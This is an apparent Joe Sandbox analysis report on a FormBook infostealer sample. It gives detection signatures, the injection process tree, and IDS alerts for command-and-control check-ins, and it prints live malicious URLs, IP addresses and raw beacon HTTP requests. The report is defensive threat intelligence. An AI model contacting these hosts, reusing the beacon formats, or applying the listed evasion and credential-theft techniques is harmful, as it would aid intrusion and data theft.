Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SpCuEoekPa.exe

Overview

General Information

Sample name:SpCuEoekPa.exe
renamed because original name is a hash value
Original sample name:e0ec2a4761f2959631f99efb266eb3aa1c78ea3ed7741c28387143dc9e28fc21.exe
Analysis ID:1588628
MD5:9a01cd212369451960342e9ccf98c51d
SHA1:4ef0a6f2fe5a55bffa839ede7a2e8093fe741533
SHA256:e0ec2a4761f2959631f99efb266eb3aa1c78ea3ed7741c28387143dc9e28fc21
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SpCuEoekPa.exe (PID: 7884 cmdline: "C:\Users\user\Desktop\SpCuEoekPa.exe" MD5: 9A01CD212369451960342E9CCF98C51D)
    • svchost.exe (PID: 8016 cmdline: "C:\Users\user\Desktop\SpCuEoekPa.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • OGbZSCDMTTWQqW.exe (PID: 6832 cmdline: "C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • comp.exe (PID: 6096 cmdline: "C:\Windows\SysWOW64\comp.exe" MD5: 712EF348F7032AA1C80D24600BA5452D)
          • OGbZSCDMTTWQqW.exe (PID: 6352 cmdline: "C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2112 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.3155508857.0000000004B80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.1680899176.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3150179402.0000000000670000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.3150964448.0000000002970000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000007.00000002.3150708105.0000000002920000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\SpCuEoekPa.exe", CommandLine: "C:\Users\user\Desktop\SpCuEoekPa.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SpCuEoekPa.exe", ParentImage: C:\Users\user\Desktop\SpCuEoekPa.exe, ParentProcessId: 7884, ParentProcessName: SpCuEoekPa.exe, ProcessCommandLine: "C:\Users\user\Desktop\SpCuEoekPa.exe", ProcessId: 8016, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\SpCuEoekPa.exe", CommandLine: "C:\Users\user\Desktop\SpCuEoekPa.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SpCuEoekPa.exe", ParentImage: C:\Users\user\Desktop\SpCuEoekPa.exe, ParentProcessId: 7884, ParentProcessName: SpCuEoekPa.exe, ProcessCommandLine: "C:\Users\user\Desktop\SpCuEoekPa.exe", ProcessId: 8016, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T03:32:05.335065+010020507451Malware Command and Control Activity Detected192.168.2.104997438.47.233.2180TCP
                2025-01-11T03:32:29.533346+010020507451Malware Command and Control Activity Detected192.168.2.1049979172.67.137.4780TCP
                2025-01-11T03:33:04.000410+010020507451Malware Command and Control Activity Detected192.168.2.1049983206.238.89.11980TCP
                2025-01-11T03:33:17.274674+010020507451Malware Command and Control Activity Detected192.168.2.104998766.29.149.4680TCP
                2025-01-11T03:33:30.621345+010020507451Malware Command and Control Activity Detected192.168.2.1049991217.70.184.5080TCP
                2025-01-11T03:33:44.702276+010020507451Malware Command and Control Activity Detected192.168.2.104999513.228.81.3980TCP
                2025-01-11T03:34:00.885211+010020507451Malware Command and Control Activity Detected192.168.2.104999913.248.169.4880TCP
                2025-01-11T03:34:15.255213+010020507451Malware Command and Control Activity Detected192.168.2.1050003104.21.64.180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T03:32:05.335065+010028554651A Network Trojan was detected192.168.2.104997438.47.233.2180TCP
                2025-01-11T03:32:29.533346+010028554651A Network Trojan was detected192.168.2.1049979172.67.137.4780TCP
                2025-01-11T03:33:04.000410+010028554651A Network Trojan was detected192.168.2.1049983206.238.89.11980TCP
                2025-01-11T03:33:17.274674+010028554651A Network Trojan was detected192.168.2.104998766.29.149.4680TCP
                2025-01-11T03:33:30.621345+010028554651A Network Trojan was detected192.168.2.1049991217.70.184.5080TCP
                2025-01-11T03:33:44.702276+010028554651A Network Trojan was detected192.168.2.104999513.228.81.3980TCP
                2025-01-11T03:34:00.885211+010028554651A Network Trojan was detected192.168.2.104999913.248.169.4880TCP
                2025-01-11T03:34:15.255213+010028554651A Network Trojan was detected192.168.2.1050003104.21.64.180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T03:32:21.843289+010028554641A Network Trojan was detected192.168.2.1049975172.67.137.4780TCP
                2025-01-11T03:32:24.372116+010028554641A Network Trojan was detected192.168.2.1049976172.67.137.4780TCP
                2025-01-11T03:32:26.972005+010028554641A Network Trojan was detected192.168.2.1049977172.67.137.4780TCP
                2025-01-11T03:32:36.425140+010028554641A Network Trojan was detected192.168.2.1049980206.238.89.11980TCP
                2025-01-11T03:32:38.971900+010028554641A Network Trojan was detected192.168.2.1049981206.238.89.11980TCP
                2025-01-11T03:32:41.534350+010028554641A Network Trojan was detected192.168.2.1049982206.238.89.11980TCP
                2025-01-11T03:33:10.550115+010028554641A Network Trojan was detected192.168.2.104998466.29.149.4680TCP
                2025-01-11T03:33:12.188505+010028554641A Network Trojan was detected192.168.2.104998566.29.149.4680TCP
                2025-01-11T03:33:14.741830+010028554641A Network Trojan was detected192.168.2.104998666.29.149.4680TCP
                2025-01-11T03:33:22.966175+010028554641A Network Trojan was detected192.168.2.1049988217.70.184.5080TCP
                2025-01-11T03:33:25.551422+010028554641A Network Trojan was detected192.168.2.1049989217.70.184.5080TCP
                2025-01-11T03:33:28.071583+010028554641A Network Trojan was detected192.168.2.1049990217.70.184.5080TCP
                2025-01-11T03:33:37.057594+010028554641A Network Trojan was detected192.168.2.104999213.228.81.3980TCP
                2025-01-11T03:33:39.608449+010028554641A Network Trojan was detected192.168.2.104999313.228.81.3980TCP
                2025-01-11T03:33:42.183675+010028554641A Network Trojan was detected192.168.2.104999413.228.81.3980TCP
                2025-01-11T03:33:50.196022+010028554641A Network Trojan was detected192.168.2.104999613.248.169.4880TCP
                2025-01-11T03:33:52.749759+010028554641A Network Trojan was detected192.168.2.104999713.248.169.4880TCP
                2025-01-11T03:33:55.293008+010028554641A Network Trojan was detected192.168.2.104999813.248.169.4880TCP
                2025-01-11T03:34:07.456560+010028554641A Network Trojan was detected192.168.2.1050000104.21.64.180TCP
                2025-01-11T03:34:10.004418+010028554641A Network Trojan was detected192.168.2.1050001104.21.64.180TCP
                2025-01-11T03:34:12.550350+010028554641A Network Trojan was detected192.168.2.1050002104.21.64.180TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.sunnyz.store/ead0/Avira URL Cloud: Label: malware
                Source: http://www.muasamgiare.click/dc08/?WLtH=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z0+LVyr2ClayYlRRqEL4rpFPwSbvhCg==&W0-=CzJDBfQxOTFPLAvira URL Cloud: Label: malware
                Source: http://www.gk88top.top/vjnn/?WLtH=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH1FtKgHUps+jxIjoel/WuIa3Au8OorA==&W0-=CzJDBfQxOTFPLAvira URL Cloud: Label: malware
                Source: http://www.gk88top.top/vjnn/Avira URL Cloud: Label: malware
                Source: https://www.muasamgiare.click/dc08/?WLtH=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgBAvira URL Cloud: Label: malware
                Source: http://www.sunnyz.store/ead0/?WLtH=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBhs+/iOoUSS+snV9WWhaA8IUFph6/7A==&W0-=CzJDBfQxOTFPLAvira URL Cloud: Label: malware
                Source: http://www.muasamgiare.click/dc08/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: SpCuEoekPa.exeVirustotal: Detection: 52%Perma Link
                Source: SpCuEoekPa.exeReversingLabs: Detection: 71%
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3155508857.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1680899176.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3150179402.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3150964448.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3150708105.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1681689182.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3152822686.0000000004B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1682428775.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: SpCuEoekPa.exeJoe Sandbox ML: detected
                Source: SpCuEoekPa.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: comp.pdb source: svchost.exe, 00000003.00000003.1648152709.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681342325.0000000003200000.00000004.00000020.00020000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000006.00000002.3151641989.0000000001108000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OGbZSCDMTTWQqW.exe, 00000006.00000000.1602038469.000000000077E000.00000002.00000001.01000000.00000006.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1757528049.000000000077E000.00000002.00000001.01000000.00000006.sdmp
                Source: Binary string: comp.pdbGCTL source: svchost.exe, 00000003.00000003.1648152709.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681342325.0000000003200000.00000004.00000020.00020000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000006.00000002.3151641989.0000000001108000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: SpCuEoekPa.exe, 00000000.00000003.1298683128.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, SpCuEoekPa.exe, 00000000.00000003.1297793424.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1586870712.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1584678539.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681746683.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681746683.000000000399E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3154326804.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1681119916.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3154326804.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1686241568.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SpCuEoekPa.exe, 00000000.00000003.1298683128.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, SpCuEoekPa.exe, 00000000.00000003.1297793424.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1586870712.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1584678539.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681746683.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681746683.000000000399E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, comp.exe, 00000007.00000002.3154326804.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1681119916.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3154326804.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1686241568.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: comp.exe, 00000007.00000002.3151190257.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3155140386.000000000358C000.00000004.10000000.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1758287414.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1990349686.000000000389C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: comp.exe, 00000007.00000002.3151190257.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3155140386.000000000358C000.00000004.10000000.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1758287414.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1990349686.000000000389C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003C445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_003C445A
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003CC6D1 FindFirstFileW,FindClose,0_2_003CC6D1
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003CC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003CC75C
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003CEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003CEF95
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003CF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003CF0F2
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003CF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003CF3F3
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003C37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003C37EF
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003C3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003C3B12
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003CBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003CBCBC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0068C420 FindFirstFileW,FindNextFileW,FindClose,7_2_0068C420
                Source: C:\Windows\SysWOW64\comp.exeCode function: 4x nop then xor eax, eax7_2_00679F20
                Source: C:\Windows\SysWOW64\comp.exeCode function: 4x nop then pop edi7_2_0067E0FB
                Source: C:\Windows\SysWOW64\comp.exeCode function: 4x nop then mov ebx, 00000004h7_2_02CF0528

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49979 -> 172.67.137.47:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49979 -> 172.67.137.47:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49982 -> 206.238.89.119:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49990 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49999 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49999 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49991 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49993 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49974 -> 38.47.233.21:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49984 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49974 -> 38.47.233.21:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50001 -> 104.21.64.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49991 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49977 -> 172.67.137.47:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50000 -> 104.21.64.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49998 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49980 -> 206.238.89.119:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49986 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49992 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49975 -> 172.67.137.47:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49976 -> 172.67.137.47:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49994 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49981 -> 206.238.89.119:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49996 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49983 -> 206.238.89.119:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49983 -> 206.238.89.119:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49995 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49995 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49987 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49987 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50002 -> 104.21.64.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49997 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50003 -> 104.21.64.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49985 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49988 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49989 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50003 -> 104.21.64.1:80
                Source: Joe Sandbox ViewIP Address: 38.47.233.21 38.47.233.21
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003D22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_003D22EE
                Source: global trafficHTTP traffic detected: GET /t67p/?WLtH=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXJ5swGMf6I8KHf6mMNpdMDm5G/Ryzlg==&W0-=CzJDBfQxOTFPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.qqa79.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                Source: global trafficHTTP traffic detected: GET /vjnn/?WLtH=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH1FtKgHUps+jxIjoel/WuIa3Au8OorA==&W0-=CzJDBfQxOTFPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.gk88top.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
